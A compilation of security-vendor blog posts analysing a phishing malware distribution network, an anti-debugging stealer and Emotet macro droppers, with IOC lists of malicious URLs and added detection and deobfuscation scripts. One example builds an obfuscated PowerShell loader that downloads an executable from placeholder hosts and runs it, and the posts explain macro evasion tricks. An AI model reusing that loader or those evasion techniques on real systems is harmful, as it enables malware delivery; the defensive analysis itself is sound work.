Channel: Bromium

Mapping Out a Malware Distribution Network

  • More than a dozen US-based web servers were used to host 10 malware families, distributed through mass phishing campaigns.
  • Malware families include Dridex, GandCrab, Neutrino, IcedID and others.
  • Evidence suggests the existence of distinct threat actors: one responsible for email and malware hosting, and others that operate the malware.
  • Indications that the servers are part of Necurs botnet malware-hosting infrastructure.

A Bromium review of threat data from May 2018 to March 2019 has documented a collection of web servers located in the United States that are being used to distribute 10 major malware families in large-scale malicious spam campaigns.

The malware hosted on the infrastructure includes five families of banking Trojans, two families of ransomware, and three information stealers. Multiple malware families were staged on the same web servers and subsequently distributed through mass phishing campaigns. The reuse of the servers to host different malware indicates the involvement of a common entity in the activities of the different malware operators. The variety of malware families hosted, and the apparent separation of command and control (C2) from email and hosting infrastructure, suggests the existence of distinct threat actors: one responsible for email and hosting, and others in charge of operating the malware.

In each of the campaigns, email was the attack vector. The phishing emails delivered Microsoft Word documents and used social engineering to trick victims into running malicious VBA macros that would download the malware. Significantly, the web servers we identified belong to a single autonomous system, AS53667, registered under the netname PONYNET, which contains 52,992 IP addresses. The hosting provider that owns PONYNET is a company called FranTech Solutions, a so-called “bulletproof host”. BuyVM is another company owned by FranTech that sells virtual private server (VPS) hosting services. One of the data centres used by BuyVM is in Nevada, US, which is where 11 of the web servers were hosted.

Malware Hosted on US Soil

It was interesting to us that the hosting infrastructure is located in the United States and not in a jurisdiction that is known to be uncooperative with law enforcement. One possible reason for choosing a US hosting provider is so that the HTTP connections to download the malware from the web servers are more likely to succeed inside organisations that block traffic to and from countries that fall outside of their typical profile of network traffic.

There is evidence to suggest that the malware identified primarily targets an anglophone audience, because all the phishing emails and documents we examined from campaigns linked to the hosting infrastructure were written in English. Moreover, several of the lures used were only relevant to a US audience. For example, in March 2019 GandCrab ransomware hosted on one of the web servers was distributed through phishing emails that purported to be from the Centers for Disease Control and Prevention (CDC), a US federal government agency.

Campaign Similarities

The servers identified run similar software builds, namely default installations of CentOS and Apache HTTP Server versions 2.4.6 or 2.2.15. The malicious executables were nearly always hosted in the root directory of the web servers. We found no evidence that the web servers ever hosted legitimate content, which suggests that they were provisioned to host malware.

Figure 1 – The default Apache installation web page had not been changed on the servers.

The naming convention of the malicious files often revealed the family of the malware or its intended purpose. For example, in a campaign in September 2018 we saw a Neutrino (also known as Kasidet) sample named ‘cc.exe’ being hosted. Neutrino is an information stealer known for exfiltrating credit card data from point of sale (POS) systems, perhaps explaining why it was given this filename.

Filename observed   Malware family
hrms.exe            Hermes
azo.exe             AZORult
dridex.exe          Dridex

 

When we examined the samples hosted on the web servers, we noticed that the time difference between when they were compiled and when they were first observed being hosted was less than 24 hours, and in some cases only a matter of hours. The quick turnaround from compilation to hosting suggests an organised relationship between malware developers and the operators of the distribution infrastructure.

SHA256                                                             Compile time        First observed hosted
125F787817B611F330AE77C773014C560A1051D26F958B01FABD7DFCEF10FC42   2019-03-13 06:01    2019-03-13 10:53

 

We identified similarities across the malicious spam campaigns delivering the different malware families hosted on the web servers. Nearly all of the campaigns delivered phishing emails with Microsoft Word documents that contained malicious VBA macros. In several campaigns, the phishing emails instead contained a hyperlink to a domain that pointed to one of the malware distribution servers. Analysis of the macros in the Word droppers found that they all contained a hard-coded IP address of the web server hosting the second-stage malware, rather than a domain name, so the download never triggers a DNS lookup that domain-reputation controls could act on. Additionally, all the macros saved the downloaded executable as ‘qwerty2.exe’ in the user’s temporary directory and ran it from there. 63% of the campaigns delivered a weaponised Word document that was password protected, with a simple password such as ‘1234’ or ‘321’ given in the message body of the email; the encryption keeps the document opaque to email gateways that cannot supply the password.

Figure 2 – Most frequently encountered weaponised document type.

We also noticed the recurrence of lures across the campaigns. The most popular lure was a job application narrative (42%) containing a resume to be reviewed, followed by emails posing as unpaid invoices (21%).

Shared Malware Hosting Infrastructure

We identified several cases where multiple malware families were hosted on the same server. In some cases, two malware families were used in conjunction with each other, where one would act as a dropper for the other. We saw this pairing behaviour in phishing campaigns in July and August 2018 that delivered AZORult, an information stealer that was used to download Hermes ransomware. In those campaigns, both types of malware were hosted on the same server.

Figure 3 – Dridex and IcedID shared distribution infrastructure.

The other pattern we saw is where the servers were reused to host malware for different campaigns. On 5 March 2019, we saw a malicious spam campaign that ultimately delivered IcedID, a banking Trojan. The following week on 13 March, we observed the same server being reused to host Dridex, a different family of banking Trojan. In another case, we saw a single web server being used to host six different malware families in campaigns over 40 days in 2018.

Links to Necurs Botnet and Signs of a Possible Dridex Resurgence

In March 2019, we noticed that one of the web servers was used to host a recent sample of Dridex. Seeing Dridex on this infrastructure was interesting to us for two reasons. First, the gang operating Dridex has been using the Necurs botnet as a vehicle for spreading their malware through malicious spam campaigns since 2016. Given the similarities between the campaigns delivering Dridex and the other malware families we identified, it is possible that this collection of web servers is part of the malware hosting and distribution infrastructure used by the operators of the Necurs botnet. All the hosted malware we examined has been linked to high-volume malicious spam campaigns that are consistent with the tactics, techniques and procedures (TTPs) and distribution-as-a-service business model of the Necurs botnet.

The second reason why this caught our attention is that, unlike the other campaigns, the web server enforced HTTP basic authentication, so the executable could not be downloaded without the correct username and password. It is likely that this was implemented to impede investigations by network defenders and researchers, because analysis of the payload then requires access to the Word dropper or to a source of network traffic containing the HTTP request, such as proxy logs or full packet capture. The username and password pair in that campaign was ‘username’ and ‘password’, and the name of the delivered file was ‘test1.exe’, suggesting that this may have been a trial campaign. Given the relative lull in Dridex activity for several months, this may be an indication of preparation for larger Dridex campaigns to come, or of the adoption of HTTP basic authentication in other campaigns.

Figure 4 – VBA code from Word dropper delivering Dridex using HTTP basic authentication in March 2019.

Malware Families Hosted

We identified 10 malware families being distributed through this hosting infrastructure, listed below.

Malware family   Type
Dridex           Banking Trojan
Gootkit          Banking Trojan
IcedID           Banking Trojan
Nymaim           Banking Trojan
Trickbot         Banking Trojan
Fareit           Information stealer
Neutrino         Information stealer
AZORult          Information stealer (used as a dropper)
GandCrab         Ransomware
Hermes           Ransomware

 

Mitigation

Email is the favoured attack vector for the malware families we identified in this research. This speaks to the enduring effectiveness of phishing campaigns at convincing users to open malicious documents and hyperlinks. Computers that are running Bromium Secure Platform are protected from these attacks because every Office document and website is opened in an isolated micro-virtual machine. Should a vulnerability be exploited, or malware downloaded by a macro, it has zero impact on the confidentiality, integrity and availability of the data held on the machine. All of the threat data associated with the attack is recorded and presented in the Bromium Controller, enabling SOC and incident response teams to gain detailed insights into the threats facing their organisations quickly.

Indicators of Compromise (IOCs)

Type        Indicator                                          Context
File path   %TEMP%\qwerty2.exe                                 Malicious executable path
IPv4        198[.]98[.]62[.]207                                Web servers used for malware distribution
            205[.]185[.]117[.]187
            205[.]185[.]117[.]44
            205[.]185[.]118[.]194
            205[.]185[.]121[.]209
            205[.]185[.]125[.]109
            205[.]185[.]125[.]244
            209[.]141[.]33[.]154
            209[.]141[.]34[.]8
            209[.]141[.]38[.]71
            209[.]141[.]41[.]188
            209[.]141[.]55[.]226
            209[.]141[.]56[.]224
            209[.]141[.]57[.]39
            209[.]141[.]57[.]59
            209[.]141[.]59[.]124
            209[.]141[.]60[.]230
            209[.]141[.]61[.]249
URL         hxxp://198[.]98.62.207/seledka.exe                 Hosted malicious files
            hxxp://198[.]98.62.207/ldr.exe
            hxxp://205[.]185.117.187/olalala/putty.exe
            hxxp://205[.]185.117.44/olala/get.php
            hxxp://205[.]185.118.194/rozita.exe
            hxxp://205[.]185.121.209/1.exe
            hxxp://205[.]185.121.209/azo.exe
            hxxp://205[.]185.121.209/5.exe
            hxxp://205[.]185.125.109/samanta.exe
            hxxp://205[.]185.125.244/1.hta
            hxxp://205[.]185.125.244/1.exe
            hxxp://209[.]141.33.154/luiluiluiluilui/lucky.exe
            hxxp://209[.]141.33.154/youwin.exe
            hxxp://209[.]141.34.8/potty.jpg
            hxxp://209[.]141.34.8/test1.exe
            hxxp://209[.]141.41.188/default.exe
            hxxp://209[.]141.41.188/soft.exe
            hxxp://209[.]141.55.226/troll.jpg
            hxxp://209[.]141.55.226/26.jpg
            hxxp://209[.]141.55.226/troll1.jpg
            hxxp://209[.]141.56.224/youwin.exe
            hxxp://209[.]141.57.39/zzzcccnnn/putty.exe
            hxxp://209[.]141.57.59/11111.exe
            hxxp://209[.]141.57.59/youwin.exe
            hxxp://209[.]141.59.124/hrms.exe
            hxxp://209[.]141.59.124/azo.exe
            hxxp://209[.]141.59.124/cc.exe
            hxxp://209[.]141.59.124/dridex.exe
            hxxp://209[.]141.59.124/1.exe
            hxxp://209[.]141.59.124/521.exe
            hxxp://209[.]141.59.124/123.exe
            hxxp://209[.]141.60.230/521.exe
            hxxp://209[.]141.60.230/516.exe
            hxxp://209[.]141.61.249/521.exe
            hxxp://209[.]141.61.249/516.exe
            hxxp://209[.]141.61.249/23.exe
            hxxp://209[.]141.61.249/555.exe
            hxxp://209[.]141.61.249/666.exe
            hxxp://209[.]141.61.249/777.exe
            hxxp://l-jaxx[.]com/x/clear.exe
            hxxp://l-jaxx[.]com/x/cli.exe
            hxxp://monkeyinferno[.]net/seledka.exe
            hxxp://monkeyinferno[.]net/ldr.exe
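
As an added example (not part of the Bromium post), the script below turns the defanged indicators above back into matchable values and applies them, together with the campaign tells described under “Campaign Similarities” and in the Dridex basic-authentication case, to proxy log lines. The log format (whitespace-separated: timestamp, client IP, method, URL, status, bytes, authorization scheme or ‘-’) and the log lines themselves are constructed for the example; only the indicator values come from the table.

```python
"""Added example, not Bromium's code: refang the post's IOCs and scan proxy logs for them
plus the behavioural tells of these campaigns (executable fetched from a bare IP over plain
HTTP, HTTP basic authentication on an executable download).

Assumed log format (mine, not the post's), whitespace separated:
  <timestamp> <client_ip> <method> <url> <status> <bytes> <auth_scheme|->
"""
import base64
import re
from urllib.parse import urlsplit

# A subset of the defanged indicators from the IOC table ("hxxp" and "[.]" are the defanging).
DEFANGED_IOCS = [
    "198[.]98[.]62[.]207",
    "209[.]141[.]34[.]8",
    "hxxp://209[.]141.34.8/test1.exe",
    "hxxp://monkeyinferno[.]net/seledka.exe",
]


def refang(indicator: str) -> str:
    """Undo defanging so the value matches what actually appears in logs."""
    return indicator.replace("hxxp", "http").replace("[.]", ".")


IOC_URLS = {refang(i) for i in DEFANGED_IOCS if "://" in i}
IOC_HOSTS = {refang(i) for i in DEFANGED_IOCS if "://" not in i} | {
    urlsplit(u).hostname for u in IOC_URLS
}
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify(line: str) -> list[str]:
    """Return the reasons a proxy log line is suspicious; an empty list means nothing matched."""
    fields = line.split()
    if len(fields) < 7:
        return ["malformed log line"]
    url, auth = fields[3], fields[6]
    parts = urlsplit(url)
    host, path = (parts.hostname or "").lower(), parts.path.lower()
    reasons = []
    if url in IOC_URLS:
        reasons.append("known malicious URL")
    if host in IOC_HOSTS:
        reasons.append("known distribution server")
    # Tells that do not depend on the indicator list. Note the .jpg-named payloads in the
    # IOC table: this extension check alone would miss them, which is why both layers run.
    if parts.scheme == "http" and BARE_IPV4.match(host) and path.endswith((".exe", ".hta")):
        reasons.append("executable fetched over plain HTTP from a bare IP (hard-coded IP in macro)")
    if auth.lower().startswith("basic") and path.endswith(".exe"):
        reasons.append("HTTP basic authentication used to fetch an executable")
    return reasons


def scan(log: str) -> dict[str, list[str]]:
    """Map each flagged URL to the reasons it was flagged."""
    hits: dict[str, list[str]] = {}
    for line in filter(str.strip, log.splitlines()):
        reasons = classify(line)
        if reasons:
            fields = line.split()
            hits[fields[3] if len(fields) > 3 else line] = reasons
    return hits


def decode_basic(header: str) -> tuple[str, str]:
    """Recover (user, password) from a captured 'Authorization: Basic ...' header value,
    which is what lets an analyst fetch a basic-auth-protected payload for analysis."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic header")
    user, _, pwd = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, pwd


# Constructed proxy log lines (client IPs, timestamps and the benign site are made up).
SAMPLE_LOG = """\
2019-03-13T10:55:01Z 10.0.0.12 GET http://209.141.34.8/test1.exe 200 412000 Basic
2019-03-13T10:56:44Z 10.0.0.25 GET http://205.185.121.209/1.exe 200 380112 -
2019-03-13T10:57:10Z 10.0.0.25 GET https://www.example.com/index.html 200 5120 -
2019-03-13T11:02:03Z 10.0.0.31 GET http://monkeyinferno.net/seledka.exe 200 300000 -
2019-03-13T11:04:19Z 10.0.0.31 GET http://209.141.55.226/troll.jpg 200 290000 -
"""

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_LOG).items():
        print(url, "->", "; ".join(reasons))
    print(decode_basic("Basic dXNlcm5hbWU6cGFzc3dvcmQ="))
```

The second line of the sample is not in the short indicator subset but is still caught by the bare-IP heuristic; the last line (a payload disguised with a .jpg name) is caught only if its URL is in the indicator list, which is the practical reason to feed the full table into IOC_URLS rather than relying on the heuristic alone.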

 

The post Mapping Out a Malware Distribution Network appeared first on Bromium.


SecureWorld Philadelphia: Visit Bromium at Booth 600

  • Going to SecureWorld Philadelphia? Visit Bromium at Booth 600!
  • Come click on ransomware at our booth
  • See a demo of Bromium Secure Platform and learn more about application isolation and containment

SecureWorld conferences provide an excellent forum for building networks among security practitioners. Their goal is to help companies improve not only their individual security posture, but also to make the overall security environment better and easier to manage. People come to SecureWorld events to meet their peers and have productive conversations about the issues they are facing and learn from each other’s best practices.

Bromium is heading to Philadelphia this week to participate in the expo. The exhibit hall hours are: Wednesday, April 10 and Thursday, April 11, from 9am through 3pm. Look for us at Booth 600.

If you are planning to attend SecureWorld in Philly, please stop by to click on ransomware. Our application isolation experts will be running demos of Bromium Secure Platform and talking about our innovative approach to enterprise security.

Learn how adding Bromium to your enterprise defenses can help strengthen your protection against threats. SecureWorld is all about networking and spreading knowledge – come see how Bromium has helped hundreds of companies secure their endpoints by trapping malware and sharing threat intelligence with security teams. We hope to see you in Philly!

Malware Debugs Itself to Prevent Analysis


We recently encountered a piece of malware via a tweet, which caught our eye because it appeared to be searching for folders related to our product. During analysis we discovered that this malware employs a novel technique to prevent reverse engineering via a debugger, and we felt that it was worth writing about, in case other malware is using similar tricks to make a researcher’s job more difficult.

Basic analysis using Procmon shows that the malware relaunches itself as a child process, which is where most of the action takes place. However, all attempts to attach a debugger to the child process for a closer look fail with the following error:

The explanation resides in the flags passed to CreateProcess by the parent. When the malware relaunches itself as a child process it does so with the DEBUG_ONLY_THIS_PROCESS flag specified. This causes the parent to act as a debugger to the child, which prevents analysts from attaching their own debugger to get a closer look at what it’s doing.

The parent then walks the child’s execution using the WaitForDebugEvent and ContinueDebugEvent API calls, creating a co-dependent relationship between parent and child that leaves no room for an additional debugger, since a process can have only one debugger attached:

Since it is not possible to attach a debugger to the child directly, the next best option is to perform a memory dump of the child and analyse this instead. However, the malware is prepared for this kind of approach and takes steps to make it more difficult.

After launching the child with the parent set as its debugger, the child calls VirtualProtectEx on its own memory with the protection PAGE_NOACCESS. This means that any attempt to read, write or execute in that region results in an access violation exception.

However, because the child is being debugged, the exception is delivered to the parent first. The parent handles it by calling VirtualProtectEx again on the region with PAGE_EXECUTE_READWRITE, temporarily allowing execution to proceed, and afterwards sets the memory back to PAGE_NOACCESS to prevent dumping:

Luckily, we can get around this by using IDA to patch the arguments passed to VirtualProtectEx, changing PAGE_NOACCESS to PAGE_EXECUTE_READWRITE, which allows a complete memory dump of the child:

Equipped with the new memory dump, it becomes much easier to get a handle on what the malware is doing:

As you can see, the malware is looking to steal cryptocurrency wallets from infected endpoints. Additionally, by tracing API calls, we find that it searches for saved logins and cookies from a number of browsers, including Bromium Secure Browser:

This kind of attack is ineffective against Bromium-secured endpoints because Bromium runs all documents and browser sessions inside a secure container, meaning that the sensitive information searched for by this malware is inaccessible and the malware has no ability to persist once the session is closed.


Social Media Platforms Bring the Dark Web Closer Than You Think

  • Some of the most popular social media platforms are being exploited by cybercriminals to openly sell their tools and expertise
  • This exploitation means that the lines between clear web platforms and their dark web equivalents have become blurred

We use social media for many reasons. Keeping up with our friends, finding out the latest news or posting photos and videos. But in the latest chapter of Into the Web of Profit, I discovered a whole new aspect of social media that’s hidden in plain sight. Cybercriminals, just like businesses, are using social media platforms to promote and sell their tools and services. Simply going on Instagram, Twitter or Facebook and conducting a few searches led me deep into the rabbit hole of the cybercrime world. I was shocked to see the extent to which social media is being exploited by cybercriminals, not just as a tool to spread malware, but as a shopping destination for their expertise and their products.

A shop front for the dark web

The major concern from these findings is how social media platforms have enabled the ready availability of products and services that were once only available in the darker corners of the internet. Up to 40% of the social media platforms examined for this report had a form of hacking service available, offering cybercrime-as-a-service, tutorials and tools like malware or ransomware. Cybercriminals are using accounts to sell these openly, or to act as a marketing portal that attracts buyers to more extensive facilities on the dark web.

Cybercriminals have become incredibly brazen on social media. One Facebook account sticks out in my mind because it was offering the opportunity to trade or learn about exploits and was actively advertising on Twitter to attract buyers. They’ve even thought about their pricing strategies too! For example, botnet and booter hire had an average cost of around $10 per month for a full-service package with tutorials and tech support, or $25 for a no-frills lifetime rental. That’s cheaper than a Netflix subscription.

What the findings clearly show is a maturing marketplace, no longer content with limiting their activities to the dark web. Cybercriminals have taken to social media to extend their reach and bring their services to a wider audience. Social media has blurred the lines between legitimate clear web platforms and illegitimate dark web marketplaces.

Social media must take an active stance against cybercrime

We can’t just unfriend social media – it’s become a central part of our personal and professional lives. However, its exploitation raises some very pressing issues. For organisations, the ready availability of cybercrime tools and services has made it much easier for hackers to launch cyberattacks. Social media is helping to bring dark web products and services to the masses, meaning attacks can come from anyone, anywhere and at any time. This can’t continue. Social media companies must take a much more active stance against the activities of cybercriminals exploiting their platforms. If we’re aware that social media is not just an avenue to deliver threats but also a market to sell them, then we can work together to stop cybercriminals exploiting it to flog their wares and make it harder for them to attract people to their dark web shopping facilities.

To learn more about the role of social media platforms in cybercrime and the implications this has for organisations, please download ‘Social Media Platforms and the Cybercrime Economy’ here.

Bromium at FS-ISAC, April 28-May 1

  • Bromium is coming to FS-ISAC – look for our experts at Booth 77 and at other Summit events – lunch, reception, after-hours events, and more
  • Come click on ransomware in our booth
  • See a demo of our application isolation and containment solution, including our unique threat intelligence

Bromium has a long history of helping financial services organizations protect their networks and sensitive data against attacks. Our innovative approach to security that foregoes detection in favor of application isolation has proven remarkably effective in containing threats while allowing employees to do their work unimpeded by restrictive IT policies.

Read: Financial Services Case Study

If you’ll be at FS-ISAC next week, come see Bromium at Booth 77 to learn about how application isolation and control can protect your organization from threats – even the ones never before seen and therefore undetectable by traditional anti-malware technologies. You can also click on ransomware and watch it execute inside a secure micro-VM, and enter our raffle for noise-cancelling headphones.

We will have several of our security experts at the booth, plus there will be multiple opportunities to network with our staff during all FS-ISAC events, such as breakfast, lunch, breaks, receptions, dinners, and after-hours events. Hope to see you in Orlando!


Emotet: Catch Me If You Can (Part 2 of 3)

  • Emotet is a highly modular banking Trojan that uses a decision-tree-based algorithm to carry out its designated tasks.
  • Due to Emotet’s capability to deliver obfuscated payloads and extend its capabilities through self-upgradable modules, it has become a commonly-used payload launcher in targeted attacks on organisations. Emotet’s use in multi-stage and multi-vector attacks has given it its nasty reputation.
  • Emotet’s operators have adopted a “malware-as-a-service” business model, where the Trojan is used to download and distribute other types of malware, such as ransomware.

This post continues James Wright’s post on Emotet, in which he explained the level of risk that Emotet poses to the enterprise and detailed how Bromium detected an attack delivering Emotet that other security tools had missed.

Read Part 1 of this blog series: Emotet: How It Might Infect Your PC (Part 1 of 3)

Since its inception in 2014 as a banking Trojan, Emotet continues to evolve as a multi-component malware family. Over the years it has adopted a highly flexible code base, which now includes the following functionalities:

  • Use of packers to evade malware classification
  • Use of anti-analysis techniques
  • Indirect execution of a payload to break process chain-based analysis
  • Privilege escalation via launching payload as a service or by stealing administrator credentials
  • Obfuscated code across stages of attack
  • Use of multiple persistence mechanisms
  • Encrypted imports and function names
  • Multiple JMP instructions in code to confuse reverse engineering tools
  • Self-upgradable modules
  • Ability to move laterally within a compromised network
  • Ability to make infected hosts send phishing email campaigns by stealing address books and credentials from web browsers and email clients

Analysis

We have conducted the analysis of Emotet in three parts. Part one, as previously mentioned, can be found here. Part two breaks down the behavioral analysis of a phishing campaign delivering Emotet. In this post, we’ll take a deep dive into its ability to drop a payload by running an obfuscated VBA macro from a Microsoft Word document. Part three, coming soon, is a binary analysis of an Emotet sample, where we will explore how the malware works.

For this analysis we obtained a sample from a recent attack that was isolated by Bromium Secure Platform.

File: Receipt (1).doc

MD5 097acffec441bdcd69ff3c56fdf0f615
SHA1 7049bbf580e598cc6bf111a0670f0d25a8ccd6c0
SHA256 6a1a7e4618a1803fce47331915610ffacc49abf261ee5783ef409e20b78c8e6d

Dropper

In this campaign Emotet was spread via a hyperlink that downloads a Microsoft Word document. When opened, the document prompts the user to click ‘Enable content’. By default, if a document contains a macro or ActiveX controls, Microsoft Word shows the user a security warning. Typically, malware authors use social engineering to trick users into clicking the ‘Enable content’ button, which runs the next stage of the attack.

In this case, enabling content causes the document to execute a VBA AutoOpen macro. As expected in Emotet VBA scripts, the strings are heavily obfuscated and include many fragmented strings. This is a well-known technique to make it harder for static analysis engines to detect malicious content.

We will walk through the script to find interesting patterns and deobfuscate the code.

Obfuscated AutoOpen macro

Variable ‘dBCwQQZ’ is defined with the string ‘winmgmts:Win32_Process’

Variable ‘TCXD_U’ is defined with the string ‘GetObject(winmgmts:Win32_ProcessStartup)’

Variable ‘jDD_UwDB’ is defined with the string ‘GetObject(winmgmts:Win32_Process).Create’

Sets the parameter of ‘GetObject(winmgmts:Win32_ProcessStartup).ShowWindow’ to a value of 0

Constructs the string ‘powershell -e’

We can see that the VBA script references WMI classes winmgmts:Win32_ProcessStartup and winmgmts:Win32_Process. On execution, the autoopen() Sub uses these WMI classes to launch an instance of PowerShell that runs a Base64 encoded command in the background.

Indirect Execution

Base64 encoded PowerShell command viewed in Bromium Controller

Since the macro uses WMI to run PowerShell, the process is launched in the background with WmiPrvSE.exe (WMI Provider Host) as its parent rather than WINWORD.EXE. By executing PowerShell this way, malware authors can evade process chain-based detection.

As explained in our article about evasion techniques used by Ursnif, this is a known technique to launch PowerShell from a macro using a legitimate Windows process. Bromium detects this type of indirect execution and attributes any related process creations to the original executable responsible for running the malicious VBA code, in this case WINWORD.exe.
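
As an added example (not Bromium’s code), the following detection logic targets the indirect-execution pattern just described: Word issues a WMI Win32_Process.Create call, WmiPrvSE.exe appears as the parent of powershell.exe, and the Office process that made the call is invisible in the ancestry. It runs over constructed process-creation records shaped like Sysmon Event ID 1 fields; the field names follow Sysmon, but the records, paths and timestamps are made up for the example.

```python
"""Added example, not Bromium's code: flag script hosts spawned by the WMI Provider Host and
recover the likely caller by time correlation, since the process tree will not show it.
Records imitate Sysmon Event ID 1 fields (UtcTime, ProcessId, Image, ParentImage, CommandLine);
the sample data below is constructed for the example.
"""
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_FLAGS = (" -e ", " -ec ", " -enc ", " -encodedcommand ")


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(records: list[dict], office_window: timedelta = timedelta(minutes=2)) -> list[dict]:
    """Return one alert per script host whose parent is WmiPrvSE.exe. Each alert lists why it
    fired; an Office application started within office_window beforehand and an encoded
    PowerShell command raise the confidence, a bare WMI-spawned script host is only a lead."""
    office_starts = [(r["UtcTime"], image_name(r["Image"])) for r in records
                     if image_name(r["Image"]) in OFFICE_APPS]
    alerts = []
    for r in records:
        child, parent = image_name(r["Image"]), image_name(r["ParentImage"])
        if parent != "wmiprvse.exe" or child not in SCRIPT_HOSTS:
            continue
        reasons = ["script host spawned by WmiPrvSE.exe (caller hidden from the process chain)"]
        cmd = f" {r['CommandLine'].lower()} "
        if child in ("powershell.exe", "pwsh.exe") and any(f in cmd for f in ENCODED_FLAGS):
            reasons.append("PowerShell encoded command")
        recent = sorted(img for t, img in office_starts
                        if timedelta(0) <= r["UtcTime"] - t <= office_window)
        if recent:
            reasons.append("Office application started shortly before: " + ", ".join(recent))
        alerts.append({"ProcessId": r["ProcessId"], "Image": r["Image"], "reasons": reasons})
    return alerts


# Constructed records: the Emotet-style chain, then a management script run via WMI hours later.
T0 = datetime(2019, 4, 25, 10, 0, 0)
SAMPLE_RECORDS = [
    {"UtcTime": T0, "ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "Receipt (1).doc"'},
    {"UtcTime": T0 + timedelta(seconds=5), "ProcessId": 4188,
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"UtcTime": T0 + timedelta(seconds=6), "ProcessId": 4204,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -e JABYAFgAUQBDAFoAQQB4AEEA"},   # placeholder base64
    {"UtcTime": T0 + timedelta(hours=3), "ProcessId": 5310,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_RECORDS):
        print(a["ProcessId"], a["Image"], "->", "; ".join(a["reasons"]))
```

The fourth record shows the caveat: management agents also launch PowerShell through WMI, so the parent relationship alone is a weak signal and the alert carries only one reason. The encoded command and the Office process started seconds earlier are what make the third record worth an analyst’s time.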

Obfuscated PowerShell command

After decoding the Base64 encoded string, the output in the image below is produced. The command is obfuscated using the same string joining and case mismatch techniques to make it harder for an analyst and scanning engines to understand.

The decoded string contains a ‘+’ character, which is used to join strings, and a mixture of upper case and lower case characters

One can simply remove all ‘+’ characters to reveal the deobfuscated command.

Command output after removing all of the ‘+’ characters

The above PowerShell command decompresses (Deflate) and Base64-decodes an embedded string, reading it as a stream until the end of the string, and then runs the resulting output in memory using ‘iex’, the alias for the Invoke-Expression cmdlet, another popular technique among malware authors for executing commands without writing a script to disk. To build the alias without the literal string appearing in the command, it uses the automatic variable $VerbosePreference, whose default value is the string ‘SilentlyContinue’. Indexing that string at positions 1 and 3 (zero-based) selects ‘i’ and ‘e’, which are then joined with ‘X’ to form ‘ieX’.

Formation of the string ‘ieX’, which is the alias for the Invoke-Expression cmdlet

Deobfuscated PowerShell Script

The deobfuscated PowerShell script first splits the string assigned to the variable $XXQCZAxA using the ‘@’ character as a delimiter and then enters a ForEach loop, which iterates the resulting array of URIs to download an executable to the victim’s filesystem using the Net.WebClient class. The script uses the environment variable $env:userProfile to fetch the user profile directory of the currently logged-in user. The downloaded file is saved to the victim’s user profile directory (e.g. C:\Users\[Username]) with the filename ’15.exe’. If the size of a downloaded file is greater than 40KB, the script exits the ForEach loop and runs ‘15.exe’ using the Invoke-Item cmdlet.

Deobfuscated PowerShell command

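
The deobfuscation steps described above, as an added example script (not Bromium’s code). The encoded PowerShell it works on is constructed here to imitate the tricks the post describes (‘+’ string joins, mixed case, the $VerbosePreference ‘ieX’ trick and an ‘@’-delimited URL list); it is not Emotet’s actual loader, and the URLs are placeholders. The only fact relied on beyond the post is that $VerbosePreference defaults to ‘SilentlyContinue’.

```python
"""Added example, not Bromium's code: decode a 'powershell -e' command line, join the '+'
string fragments, resolve the $VerbosePreference 'ieX' trick, normalise token case and pull
out the download URLs and dropped file name. STAGE_OBFUSCATED is constructed for the example.
"""
import base64
import re

# Constructed stage, as it would look after decoding the -e argument (not Emotet's real code).
STAGE_OBFUSCATED = (
    "$VqZ = 'fOrEaCh($u in \"http://example.invalid/wp-admin/AbC/@ht'+'tp://example.invalid/css/DeF/\"."
    "sPlIt(\"@\")){try{$w = nEw-ObJeCt (\"Ne\"+\"t.We\"+\"bCli\"+\"ent\");'+"
    "'$p = $env:userProfile + \"\\15.exe\";$w.(\"Down\"+\"loadFile\")($u,$p);'+"
    "'if((Get-Item $p).length -ge 40000){Invoke-Item $p;break}}catch{}}';"
    ".( $VerbosePreference.ToString()[1,3]+'X'-join'') $VqZ"
)
# -EncodedCommand takes Base64 of UTF-16LE text, so that is how the sample is packed.
ENCODED_CMDLINE = "powershell -e " + base64.b64encode(
    STAGE_OBFUSCATED.encode("utf-16-le")).decode("ascii")

SILENTLY = "SilentlyContinue"   # default value of $VerbosePreference
VP_TRICK = r"\$VerbosePreference\.ToString\(\)\[(\d+),(\d+)\]\+'(\w)'-join''"


def decode_encoded_command(cmdline: str) -> str:
    """Find the -e/-enc/-EncodedCommand argument and decode it (Base64 of UTF-16LE)."""
    m = re.search(r"-e\w*\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        raise ValueError("no encoded command found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def join_fragments(script: str) -> str:
    """'ab' + 'cd' -> 'abcd' (same for double quotes). Concatenations involving a variable,
    such as $env:userProfile + '\\x.exe', are real operations and are left alone."""
    return re.sub(r"""(['"])\s*\+\s*\1""", "", script)


def resolve_verbosepreference(expr: str) -> str:
    """$VerbosePreference.ToString()[i,j]+'X'-join'' -> the characters it spells."""
    m = re.search(VP_TRICK, expr, re.I)
    if not m:
        raise ValueError("pattern not recognised")
    i, j, tail = int(m.group(1)), int(m.group(2)), m.group(3)
    return SILENTLY[i] + SILENTLY[j] + tail


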